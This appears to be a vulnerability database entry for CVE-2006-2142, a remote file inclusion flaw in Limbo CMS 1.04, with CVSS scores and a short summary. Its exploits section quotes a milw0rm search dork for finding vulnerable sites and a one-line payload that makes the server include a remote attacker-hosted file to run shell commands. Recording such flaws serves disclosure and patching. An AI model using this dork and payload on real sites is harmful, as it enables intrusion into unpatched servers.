6.4
CVSSv2

CVE-2006-2142

Published: 02/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

PHP remote file inclusion vulnerability in classes/adodbt/sql.php in Limbo CMS 1.04 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the classes_dir parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

limbo cms limbo cms 1.0.4

limbo cms limbo cms 1.0.4.2

Exploits

Title: Limbo CMS <= 104 Remote File Inclusion URL: wwwlimbo-cmscom/ Dork: inurl:"index2php?option=rss" OR "powered By Limbo CMS" Credits: [Oo] Exploit: /classes/adodbt/sqlphp?classes_dir=yourhost/cmdgif?cmd=ls # milw0rmcom [2006-04-29] ...